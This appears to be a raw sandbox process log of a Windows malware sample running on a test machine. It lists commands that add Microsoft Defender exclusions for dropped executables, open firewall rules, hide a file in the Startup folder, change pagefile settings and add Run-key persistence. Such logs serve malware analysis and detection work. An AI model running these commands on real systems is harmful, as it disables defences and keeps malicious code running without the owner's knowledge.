nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com
2472WMIC.exe wmic ComputerSystem get Domain
2568powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\C3.exe"'
2672powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
2796powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe"'
28847z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y C3.7z
2964powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\4.zip"'
1176powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.zip"'
28607z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y 4.zip
2148netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
1712netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
1476WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
200WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
1668C3.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
3060attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
2552reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "4" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.exe" /F
2044.exe "4.exe"
2468netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2524netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2824WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
2992WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
840attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
2728reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "C3" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe" /F
2684